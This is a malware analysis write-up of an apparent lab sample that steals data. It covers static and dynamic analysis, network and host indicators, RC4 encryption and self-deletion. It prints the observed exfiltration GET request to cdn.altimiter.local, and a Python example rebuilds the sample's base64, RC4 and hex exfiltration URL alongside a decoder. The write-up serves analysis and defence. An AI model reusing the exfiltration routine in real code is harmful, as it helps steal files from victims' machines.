Data Exfiltration Malware: Unraveling the Mystery
Static Analysis, Dynamic Analysis & Reverse Engineering of Data Exfiltration Malware
In the ever-evolving digital landscape, data exfiltration malware is the shadowy intruder that quietly siphons away sensitive information. With a keen eye for detail, we're about to unravel its secrets and expose its true nature.
File Hash & VT Analysis: Unveiling the Bad Boys
Our adventure kicks off with a SHA-256 hash, in the form sha256sum prints it: 3aca2a08cf296f1845d6171958ef0ffd1c8bdfc3e48bdd34a605cb1f7468213e *unknown.exe.malz (the .malz extension is a rename that keeps Windows from running the sample by accident). With 43 of 72 VirusTotal engines flagging it, this binary is no ordinary piece of code. It's time to dig deeper.
Architecture and Language:
This 64-bit PE was compiled from Nim; Nim binaries typically give themselves away through runtime tells such as the NimMain symbol and .nim source file names in the strings output. Knowing the toolchain matters, because Nim produces large, statically linked executables in which compiler-generated code can drown out the malicious logic, so it tells us which functions to skip and which to chase. Let's dive into the world of this covert operator.
Basic Static Analysis: Strings, Secrets, and Path-etic Discoveries
Running strings and FLOSS over the sample reveals the first clues: a URL, the file name cosmo.jpeg, a Windows file path, and an odd name, houdini. It's evident that the binary is up to something, but we're just scratching the surface.
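To make the basic-static step concrete, here is a small strings extractor added for this write-up; it is not tooling from the original analysis and was not run against unknown.exe. It pulls both ASCII and UTF-16LE runs, since Windows binaries often keep paths and API arguments as wide strings that the plain strings command misses unless you pass -e l, and then flags the hits that look like indicators. The byte blob it scans is constructed for the example, with the names from this analysis planted in it.

```python
import re
from typing import List, Tuple

# Constructed sample blob (not bytes from unknown.exe): a fake header, an
# ASCII URL, a UTF-16LE Windows path, a too-short decoy ("ab") and two names.
SAMPLE_BLOB = (
    b"\x4d\x5a\x90\x00\x03\x00"
    + b"http://cdn.altimiter.local/feed?post="
    + b"\x00\x01\x02"
    + "C:\\Users\\Public\\passwrd.txt".encode("utf-16le")
    + b"\x00\x00\xff\xfe"
    + b"cosmo.jpeg\x00"
    + b"ab\x00"
    + b"houdini\x00"
)

# Classifiers for the kinds of string a triage pass cares about first.
IOC_PATTERNS = {
    "url": re.compile(r"https?://[^\s\"']+"),
    "win_path": re.compile(r"[A-Za-z]:\\[^\s\"']+"),
    "filename": re.compile(r"\b[\w.-]+\.(?:exe|dll|jpe?g|png|txt|dat)\b", re.I),
}


def extract_strings(data: bytes, min_len: int = 4) -> List[Tuple[int, str, str]]:
    """Return (offset, encoding, text) for every printable run of at least
    min_len characters, in both ASCII and UTF-16LE, sorted by offset."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = []
    for m in ascii_re.finditer(data):
        found.append((m.start(), "ascii", m.group().decode("ascii")))
    for m in wide_re.finditer(data):
        found.append((m.start(), "utf-16le", m.group().decode("utf-16le")))
    found.sort()
    return found


def triage(strings: List[Tuple[int, str, str]]) -> List[Tuple[str, str]]:
    """Keep only strings that match an IOC pattern, labelled by kind.
    The first matching pattern wins, so a URL is not also reported as a file."""
    hits = []
    for _offset, _enc, text in strings:
        for kind, pattern in IOC_PATTERNS.items():
            if pattern.search(text):
                hits.append((kind, text))
                break
    return hits


if __name__ == "__main__":
    for offset, enc, text in extract_strings(SAMPLE_BLOB):
        print(f"{offset:#08x} {enc:8} {text}")
    print("IOC candidates:", triage(SAMPLE_BLOB and extract_strings(SAMPLE_BLOB)))
```

The point of the two-pass scan is that the UTF-16LE path would be invisible to a default strings run, while houdini survives extraction but is not an indicator by itself; it is a lead for the disassembler, which is exactly how it is used later in this analysis.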
IAT & PE View:
The import table lists GetCurrentProcessId, GetCurrentThreadId, TerminateProcess and VirtualProtect. A caveat before reading too much into this: the first three are commonly pulled in by C runtime startup code in ordinary Windows executables, so on their own they prove nothing. VirtualProtect is the import worth noting, because a program that changes page permissions at runtime may be unpacking or patching its own code. The plot thickens as we delve further into the digital labyrinth.
Basic Dynamic Analysis: The Plot Thickens
On initial detonation with no network simulation there are no glaring visual indicators: the binary, here named "unknown.exe," simply deletes itself. Running it again with INetSim answering DNS and HTTP changes the outcome. There is still nothing to see on screen, but the binary no longer vanishes, which suggests that its self-deletion depends on whether a callback succeeds and sends us to look at the network traffic.
Network Signatures:
Our digital detective work uncovers the network signatures.
The binary first makes a callback to the domain "update.ec12-4-109-278-3-ubuntu20-04.local." It then issues a GET request to "http://cdn.altimiter.local/feed?post=B69A1CF6853645A440A0337BA0FB38291DE0B01A07FC129199658DDD4C1286BE45FEA8851D9BC6BC34220A6466D404C49A988BD6895AF291136076CCAFA9". The value of the post= parameter is not an encrypted URL but hex-encoded ciphertext: this is the exfiltrated data leaving the host.
When I pointed the callback hostnames at my own machine in /etc/hosts, the callbacks arrived on TCP port 80.
Host Indicators: The Accomplices Revealed
The binary isn't just phoning home; it writes a passwrd.txt file into C:\Users\Public.
It also opens cosmo.jpeg, the file it goes on to exfiltrate.
Advanced Static Analysis: The Code Breaker's Dilemma
Advanced static analysis leads us to an RC4 routine. The key comes from the password file dropped in C:\Users\Public, and with it the binary encrypts the contents of "cosmo.jpeg" before sending them out. Because RC4 is symmetric, whoever recovers that key file can also decrypt whatever was captured on the wire.
Another interesting function is houdini, and the name fits: it is the routine that deletes the binary.
It is invoked under three conditions.
First, if the initial callback domain is unavailable or the binary cannot make contact with it, the binary deletes itself.
Second, if the network is lost or the exfiltration is otherwise interrupted during the exfiltration routine, the binary deletes itself.
Finally, when the exfiltration subroutine completes, the binary deletes itself.
Together these make the sample hard to recover from a compromised host: a blocked callback and a completed theft both leave no binary behind, so the file has to be captured before detonation.
Summary:
If the binary contacts the initial callback domain successfully, exfiltration occurs.
After a successful check-in with this domain, the sample unpacks the passwrd.txt file into C:\Users\Public, opens a handle to cosmo.jpeg, base64-encodes the contents of the file, and runs the result through the RC4 encryption routine.
The first callback domain is http://update.ec12-4-109-278-3-ubuntu20-04.local. It does not appear in the strings output, so it is not stored in the clear and was only recoverable by watching the traffic.
Exfiltration is achieved with the http://cdn.altimiter.local domain.
Unknown.exe deletes itself under the following conditions:
If the executable runs and cannot make a successful connection to the initial callback URL (http://update.ec12-4-109-278-3-ubuntu20-04.local)
If the executable is interrupted in the middle of its exfiltration routine (i.e. if INetSim is shut off while the binary is exfiltrating data)
If the executable finishes its exfiltration routine
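The encryption routine described in the advanced static analysis and the pipeline spelled out in this summary (base64, then RC4, then hex in the post= parameter of GET /feed) can be reproduced and reversed in a few lines. The block below is an added example written for this write-up, not code from the sample or the original analysis. The key bytes and image bytes are constructed, because the real key in passwrd.txt and the real cosmo.jpeg are not given here; the host name is the one observed. It assumes the whole file goes in one request; if the sample chunks it, decode each captured request and concatenate in order.

```python
import base64
from urllib.parse import urlparse, parse_qs

# Constructed demo values: not the real key from passwrd.txt or the real image.
DEMO_KEY = b"example-key-from-passwrd.txt"
DEMO_IMAGE = b"\xff\xd8\xff\xe0" + b"JFIF demo pixels..." * 3


def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4: key scheduling (KSA) followed by keystream XOR (PRGA).
    The cipher is symmetric, so the same call encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                          # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                             # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_exfil_url(key: bytes, file_bytes: bytes,
                    host: str = "http://cdn.altimiter.local") -> str:
    """Reproduce the routine the write-up describes: base64 the file, RC4 the
    result with the dropped key, hex-encode it and place it in post=."""
    blob = rc4(key, base64.b64encode(file_bytes))
    return f"{host}/feed?post={blob.hex().upper()}"


def recover_exfil(key: bytes, url: str) -> bytes:
    """Reverse the routine for a captured request. With the right key the RC4
    output is valid base64; validate=True makes a wrong key fail loudly
    (ValueError) instead of quietly returning garbage."""
    params = parse_qs(urlparse(url).query)
    if "post" not in params:
        raise ValueError("no post= parameter in captured URL")
    b64 = rc4(key, bytes.fromhex(params["post"][0]))
    return base64.b64decode(b64, validate=True)


if __name__ == "__main__":
    url = build_exfil_url(DEMO_KEY, DEMO_IMAGE)
    print(url)
    print(recover_exfil(DEMO_KEY, url) == DEMO_IMAGE)
```

The base64 step is a useful tell in practice: after RC4 with a candidate key, the output must consist only of base64 alphabet characters, so a bad key is rejected immediately rather than producing a plausible-looking but wrong image.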
Conclusion:
Our journey through the world of data exfiltration malware has revealed an intricate web of covert operations. With a binary that erases itself under specific conditions, we're left with more questions than answers. In the realm of cybersecurity, remaining vigilant and inquisitive is essential to uncovering and thwarting such covert digital operations. Stay curious and stay safe, for the digital landscape is ever-evolving and filled with mysteries.